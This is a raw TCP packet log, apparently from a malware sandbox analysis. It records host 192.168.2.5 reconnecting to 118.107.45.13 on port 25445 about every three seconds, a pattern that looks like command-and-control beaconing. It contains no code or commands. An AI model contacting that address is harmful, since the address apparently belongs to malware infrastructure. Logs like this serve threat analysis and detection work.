Dec 29, 2024 16:04:05.213604927 CET	49787	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:05.334640980 CET	25445	49787	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:05.335597038 CET	49787	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:06.746598959 CET	49787	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:06.867419004 CET	25445	49787	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:07.935096025 CET	25445	49787	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:07.939238071 CET	49787	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:07.948998928 CET	49787	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:08.525120020 CET	49796	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:08.646132946 CET	25445	49796	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:08.646294117 CET	49796	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:09.576639891 CET	49796	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:09.697561979 CET	25445	49796	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:11.233649969 CET	25445	49796	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:11.233715057 CET	49796	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:11.233839035 CET	49796	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:12.032408953 CET	49805	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:12.153331041 CET	25445	49805	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:12.153681040 CET	49805	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:12.999126911 CET	49805	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:13.120004892 CET	25445	49805	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:14.709572077 CET	25445	49805	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:14.710897923 CET	49805	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:14.711078882 CET	49805	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:15.388463020 CET	49814	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:15.509393930 CET	25445	49814	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:15.509475946 CET	49814	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:16.763887882 CET	49814	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:16.884831905 CET	25445	49814	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:18.092381954 CET	25445	49814	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:18.092458963 CET	49814	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:18.092556000 CET	49814	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:18.614603996 CET	49823	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:18.735476971 CET	25445	49823	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:18.735590935 CET	49823	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:19.798784018 CET	49823	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:19.920033932 CET	25445	49823	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:21.307729959 CET	25445	49823	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:21.307799101 CET	49823	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:21.307982922 CET	49823	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:22.186013937 CET	49831	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:22.308238983 CET	25445	49831	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:22.308363914 CET	49831	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:22.918289900 CET	49831	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:23.128271103 CET	25445	49831	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:24.875838041 CET	25445	49831	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:24.875905991 CET	49831	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:24.876005888 CET	49831	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:25.389508963 CET	49840	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:25.510451078 CET	25445	49840	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:25.510531902 CET	49840	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:26.036552906 CET	49840	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:26.157465935 CET	25445	49840	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:28.117734909 CET	25445	49840	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:28.117810011 CET	49840	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:28.117899895 CET	49840	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:29.047518969 CET	49848	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:29.168580055 CET	25445	49848	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:29.168668985 CET	49848	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:30.008032084 CET	49848	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:30.128942966 CET	25445	49848	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:31.754718065 CET	25445	49848	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:31.754849911 CET	49848	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:31.754935980 CET	49848	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:32.437205076 CET	49857	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:32.557990074 CET	25445	49857	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:32.558059931 CET	49857	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:32.946003914 CET	49857	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:33.066812992 CET	25445	49857	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:35.140486956 CET	25445	49857	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:35.140563011 CET	49857	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:35.140713930 CET	49857	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:36.139627934 CET	49865	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:36.260822058 CET	25445	49865	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:36.260978937 CET	49865	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:36.541899920 CET	49865	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:36.662878036 CET	25445	49865	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:38.839308977 CET	25445	49865	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:38.839504004 CET	49865	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:38.839603901 CET	49865	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:39.545121908 CET	49874	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:39.665947914 CET	25445	49874	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:39.666038990 CET	49874	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:39.888396978 CET	49874	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:40.009344101 CET	25445	49874	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:42.283600092 CET	25445	49874	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:42.283689976 CET	49874	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:42.283835888 CET	49874	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:42.987490892 CET	49882	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:43.108330965 CET	25445	49882	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:43.111291885 CET	49882	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:43.552191019 CET	49882	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:43.673161030 CET	25445	49882	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:45.680610895 CET	25445	49882	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:45.681638002 CET	49882	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:45.707469940 CET	49882	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:46.560889959 CET	49891	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:46.681818008 CET	25445	49891	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:46.681941032 CET	49891	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:46.882335901 CET	49891	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:47.003330946 CET	25445	49891	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:49.258388042 CET	25445	49891	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:49.258594036 CET	49891	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:49.258594036 CET	49891	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:49.763773918 CET	49899	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:49.884908915 CET	25445	49899	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:49.884988070 CET	49899	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:50.066020012 CET	49899	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:50.186883926 CET	25445	49899	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:52.538095951 CET	25445	49899	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:52.538175106 CET	49899	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:52.538265944 CET	49899	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:53.014890909 CET	49907	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:53.135826111 CET	25445	49907	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:53.135925055 CET	49907	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:53.789659023 CET	49907	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:53.910593033 CET	25445	49907	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:55.796144962 CET	25445	49907	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:55.797285080 CET	49907	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:55.797396898 CET	49907	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:56.466834068 CET	49916	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:56.587798119 CET	25445	49916	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:56.587888002 CET	49916	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:56.781107903 CET	49916	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:56.902028084 CET	25445	49916	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:59.176953077 CET	25445	49916	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:59.177025080 CET	49916	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:59.177136898 CET	49916	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:59.812164068 CET	49924	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:04:59.932926893 CET	25445	49924	118.107.45.13	192.168.2.5
Dec 29, 2024 16:04:59.937366962 CET	49924	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:00.173053980 CET	49924	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:00.293977022 CET	25445	49924	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:02.477324963 CET	25445	49924	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:02.477571964 CET	49924	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:02.477735043 CET	49924	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:03.149924040 CET	49933	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:03.270909071 CET	25445	49933	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:03.271001101 CET	49933	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:03.527785063 CET	49933	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:03.648869991 CET	25445	49933	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:05.925956011 CET	25445	49933	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:05.926062107 CET	49933	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:05.926126957 CET	49933	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:06.259440899 CET	49939	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:06.380681038 CET	25445	49939	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:06.381062984 CET	49939	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:06.640521049 CET	49939	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:06.761584044 CET	25445	49939	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:09.016978025 CET	25445	49939	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:09.017087936 CET	49939	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:09.017182112 CET	49939	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:09.340209007 CET	49947	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:09.461051941 CET	25445	49947	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:09.461158991 CET	49947	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:09.742774963 CET	49947	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:09.863948107 CET	25445	49947	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:12.022485018 CET	25445	49947	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:12.022548914 CET	49947	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:12.190466881 CET	49947	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:12.578499079 CET	49956	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:12.699430943 CET	25445	49956	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:12.699510098 CET	49956	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:12.969182014 CET	49956	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:13.090373993 CET	25445	49956	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:15.286711931 CET	25445	49956	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:15.286773920 CET	49956	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:15.286906004 CET	49956	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:15.517745018 CET	49964	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:15.638597965 CET	25445	49964	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:15.638689995 CET	49964	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:15.940854073 CET	49964	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:16.061909914 CET	25445	49964	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:18.264120102 CET	25445	49964	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:18.264174938 CET	49964	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:18.265414953 CET	49964	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:18.466823101 CET	49970	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:18.591355085 CET	25445	49970	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:18.595531940 CET	49970	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:18.908404112 CET	49970	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:19.030642986 CET	25445	49970	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:21.221565962 CET	25445	49970	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:21.222045898 CET	49970	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:21.222223997 CET	49970	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:21.412960052 CET	49977	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:21.533951044 CET	25445	49977	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:21.534070969 CET	49977	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:21.813374996 CET	49977	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:21.934287071 CET	25445	49977	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:24.160770893 CET	25445	49977	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:24.163520098 CET	49977	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:24.163561106 CET	49977	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:24.339549065 CET	49983	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:24.461435080 CET	25445	49983	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:24.463437080 CET	49983	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:24.784013987 CET	49983	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:24.904856920 CET	25445	49983	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:25.991158009 CET	49736	80	192.168.2.5	104.21.81.224
Dec 29, 2024 16:05:26.112354040 CET	80	49736	104.21.81.224	192.168.2.5
Dec 29, 2024 16:05:26.113073111 CET	49736	80	192.168.2.5	104.21.81.224
Dec 29, 2024 16:05:27.045694113 CET	25445	49983	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:27.045777082 CET	49983	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:27.045887947 CET	49983	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:27.359082937 CET	49989	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:27.479933977 CET	25445	49989	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:27.480026960 CET	49989	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:27.790754080 CET	49989	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:27.911659002 CET	25445	49989	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:30.086890936 CET	25445	49989	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:30.086961985 CET	49989	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:30.087068081 CET	49989	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:30.344144106 CET	49999	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:30.465243101 CET	25445	49999	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:30.465351105 CET	49999	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:30.786375046 CET	49999	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:30.907572985 CET	25445	49999	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:33.082415104 CET	25445	49999	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:33.082473993 CET	49999	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:33.082559109 CET	49999	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:33.223270893 CET	50006	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:33.344299078 CET	25445	50006	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:33.344398022 CET	50006	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:33.675451994 CET	50006	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:33.932425022 CET	25445	50006	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:35.927373886 CET	25445	50006	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:35.927490950 CET	50006	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:35.927604914 CET	50006	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:36.064995050 CET	50012	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:36.185944080 CET	25445	50012	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:36.186038971 CET	50012	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:36.571271896 CET	50012	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:36.692214966 CET	25445	50012	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:38.749191046 CET	25445	50012	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:38.749387026 CET	50012	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:38.749475002 CET	50012	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:38.823075056 CET	50018	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:38.944102049 CET	25445	50018	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:38.944312096 CET	50018	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:39.301876068 CET	50018	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:39.422791004 CET	25445	50018	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:41.595684052 CET	25445	50018	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:41.595788002 CET	50018	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:41.595900059 CET	50018	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:41.743832111 CET	50021	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:41.864857912 CET	25445	50021	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:41.864958048 CET	50021	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:42.212431908 CET	50021	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:42.333256006 CET	25445	50021	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:44.407639027 CET	25445	50021	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:44.407747984 CET	50021	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:44.407844067 CET	50021	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:44.500641108 CET	50022	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:44.621531963 CET	25445	50022	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:44.621612072 CET	50022	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:44.972731113 CET	50022	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:45.093807936 CET	25445	50022	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:47.251506090 CET	25445	50022	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:47.251576900 CET	50022	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:47.251672029 CET	50022	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:47.306554079 CET	50023	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:47.427582979 CET	25445	50023	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:47.427659988 CET	50023	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:47.755774021 CET	50023	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:47.877410889 CET	25445	50023	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:50.015608072 CET	25445	50023	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:50.015702009 CET	50023	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:50.015803099 CET	50023	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:50.055041075 CET	50024	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:50.175956964 CET	25445	50024	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:50.176127911 CET	50024	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:50.500590086 CET	50024	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:50.638374090 CET	25445	50024	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:52.722014904 CET	25445	50024	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:52.722095013 CET	50024	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:52.722224951 CET	50024	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:52.748073101 CET	50025	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:52.868961096 CET	25445	50025	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:52.869061947 CET	50025	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:53.179281950 CET	50025	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:53.300666094 CET	25445	50025	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:55.480433941 CET	25445	50025	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:55.480523109 CET	50025	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:55.480609894 CET	50025	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:55.503822088 CET	50026	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:55.624779940 CET	25445	50026	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:55.624995947 CET	50026	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:55.945127010 CET	50026	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:56.066107035 CET	25445	50026	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:58.210001945 CET	25445	50026	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:58.210253954 CET	50026	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:58.218334913 CET	50026	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:58.274255037 CET	50027	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:58.395477057 CET	25445	50027	118.107.45.13	192.168.2.5
Dec 29, 2024 16:05:58.395709038 CET	50027	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:59.038944960 CET	50027	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:05:59.159841061 CET	25445	50027	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:00.942287922 CET	25445	50027	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:00.942476034 CET	50027	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:00.963156939 CET	50027	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:01.499697924 CET	50028	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:01.620665073 CET	25445	50028	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:01.620743990 CET	50028	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:01.980576038 CET	50028	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:02.101707935 CET	25445	50028	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:04.199384928 CET	25445	50028	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:04.199455023 CET	50028	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:04.199557066 CET	50028	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:04.220961094 CET	50029	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:04.341785908 CET	25445	50029	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:04.341881037 CET	50029	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:04.684120893 CET	50029	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:04.805418968 CET	25445	50029	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:06.947031021 CET	25445	50029	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:06.947180986 CET	50029	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:06.947288990 CET	50029	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:06.970417976 CET	50030	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:07.091427088 CET	25445	50030	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:07.091559887 CET	50030	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:07.502183914 CET	50030	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:07.624319077 CET	25445	50030	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:09.626951933 CET	25445	50030	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:09.627036095 CET	50030	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:09.627190113 CET	50030	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:09.638576984 CET	50031	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:09.760112047 CET	25445	50031	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:09.760221004 CET	50031	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:10.091094971 CET	50031	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:10.212681055 CET	25445	50031	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:12.301271915 CET	25445	50031	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:12.301352024 CET	50031	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:12.301450014 CET	50031	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:12.310694933 CET	50032	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:12.431698084 CET	25445	50032	118.107.45.13	192.168.2.5
